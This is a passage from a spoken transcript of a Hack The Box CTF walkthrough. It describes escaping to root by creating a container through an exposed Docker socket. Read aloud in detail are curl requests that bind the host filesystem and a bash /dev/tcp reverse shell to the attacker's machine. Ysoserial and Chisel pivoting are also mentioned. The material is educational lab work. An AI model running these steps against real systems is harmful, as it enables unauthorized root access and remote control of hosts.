call docker.sh. Found it. And we'll do a chmod plus x docker.sh, and then we can run, we'll run docker.sh. And it does come back and it said it created this container. So just like everything else, it created a container. Now we need to start the container. So we'll come back to our Genie, and this is our start command. So I should be able to pull this in here and just paste it into here. Now, we don't want to run it quite yet because we're not running an executable anymore. Now we're just running a container. So we got to say containers, that container and start, and then we don't need all this information. So xpost, the content type will leave. No, honestly, we don't even need that. So I don't need any of this binary data. I don't need any of this header information. We're just going to run a post telling it to start. And it came back. Might have some slash issues here. There's a whole lot of hassle here with this bin bash. And we're running it in temp. So this is why it's important to keep this stuff in Genie, because we can easily just edit it. So bash, I missed it. There should be another bash here. Man, so many bashes. So this should be bash C, single quote, bash again, run it all, and then single followed by double. So much going on. So let's go ahead and try that again. Give it that whole command. We have a new container. Same thing, copy. And we'll come back to our start. We've already cut this one down, so it's good to go. Paste it in, select it all, and paste it in here. And it hates me. There's a lot that goes into this one. Let's try and double check my notes real quick as we go through this, and we'll step again. Bin bash, we're going to do our shell, double quote bash C, single quote bash I, because we're going to interact with it, greater than and this is your typical reverse shell, dev TCP 10.10.10 or 10.10.14.3. We're doing it on port 5555, 0, greater than and 1. We're going to do a single followed by a double because we have a single here and then a double here. That is our shell, and it's good. The payload. We're going to put this all inside of 2 double quote, and then we're going to put it inside of 2 brackets, and then in here everything's going to be separated, so it's escape double, bin bash, escape double. And I said bin bash. I mean, we can run sh and just try and make sure it's not an issue with that. So comma, and then we're going to run C inside of 2 double quotes, escaped, comma, and then double quote escape, and then it's going to be root mount sh-c. This is going to come back to 1/ followed by a double quote, 1/ followed by a double quote. $shell should run all of this plopped right inside the middle of this. So that payload looks good. We'll just double check this. So it's a -d. So we're running a curl s Unix socket, Docker.sock, xpost. We're telling it what kind of content type, and then inside of there, there's double quote image. And the image that we're asking it to build is going to be sandbox. Inside of that is going to be double quotes for command, followed by payload, which references this. We're going to do binds, and that is going to be inside a bracket with no quotes outside. The quotes will be on the inside. So this is double quote. So it'll be slash colon mount slash colon RW. So much goodness. We did keep the content type application JSON, and we told it containers create. So we'll try this one again. Made a couple changes to it. It's going to give us a new container. And we'll just check here. So curl is Unix socket var run Docker.sock xpost containers. We'll paste in this new value here, and then just tell it to start. And by doing it, it says no content. So that might have just taken us a hot minute to get there. We can try and run. There's an additional command here, which is following it all up with logs, standard error command, xpost. The 204 was a little strange though. I'm gonna go ahead and bring this command over. And that didn't do me any good. We'll run output just to make sure we put the output out there. Nowhere. And it's going to be localhost containers. There's a container number, and instead of start, we're going to say logs question mark standard error equals 1 and standard out equals 1. Put that all inside of a double quote. And we'll see what that gets us. And it does come back chunked, and it says 200 OK. So it was seeing that there is something there. And if we come back over here, here's our 5555. It is saying that we have a connection from 205. It is saying we're root, and now we have a different number, 7536970 E2B6. If I say ID, you're going to see all these groups, If I come over here and I say ID, you're only going to see root. So we're definitely in a different place now. So let's go to cd root ls, and there's a root.txt. So I'm going to cat root.txt, and there's our root. Man, like I said, there's so many typos. This is with notes. I ran this when it first came out, and just syntax errors left, right, center, everywhere. So please don't get discouraged. Just try and follow along. If you have any questions, let me know. I will dig into this for you as much as I can. I'm not going to present any information about how the Java deserialization worked, but definitely look into Ysoserial. That was a quick example of using it with a little bit of syntax if you look at the script. So go back and read that script, and it's just going to tell you how it ran the Java jar and then executed against the common collections too. There's definitely a lot of information out there. Please take a look at some of the HackTheBox old boxes that have it. If you have VIP, you can access those at any time. This also included multiple RCEs. You saw that there was a couple CVEs that were available. You just keep looking around, you'll find some of those scripts. Take a look at the way that people wrote their scripts. I tried to make a Python 3 version of this, which I can run from my box, but it does not work with these Dockers. So I really look forward to a box in the future where I might be able to show you how I built my script. So I built it all up, but it just didn't have the import, the modules available. So kind of a bummer, but not a big deal. This box was crazy. I want to thank, this was Mr. Reboot. So Mr. Reboot and Minato TW, they were both heavy-handed in some of the stuff that was happening with DANTE. I just want to announce, boom, there's my certificate. I am done. I'm going to do a write-up in the next week or so to explain some of the challenges I had as a 2018 grad of OSCP prior to all the new stuff that came out. I haven't seen any of the new content. I really didn't want to do a write-up because it didn't, I don't think it would have helped people. But now that I've done some of this stuff, I've done DANTE, I've gone back and tried to refresh some of those skills, I can tell you for certain DANTE provides a lot of good information. And I'm going to start tagging that stuff in my videos. Like you saw here today, I talked about Chisel. Chisel is an indispensable tool. Don't leave it behind. There was some references on that same page to SSF. I tried that. It worked a little bit, but Chisel is super easy, super simple, and it gets around all the SSH issues. It runs its own little system. So definitely recommend taking a look at that stuff if you're going to be on kind of in systems that have multiple computers. So when you talk about HackTheBox and some of the CTF stuff, they're not networked. But when you start working with network computers and domain or little enclaves behind of enclaves, Chisel's super handy. And it doesn't require any kind of permissions like SSH. You're going to be able to run it on Windows or Linux. And once you get the command structure down, it's super fun, super easy. So I just want to share some of that stuff with you. It's been a great week. I really appreciate everybody that's coming out. I look forward. Please get the information out there. Tell people to come check us out. Hit that subscribe button, and I will see you again next week.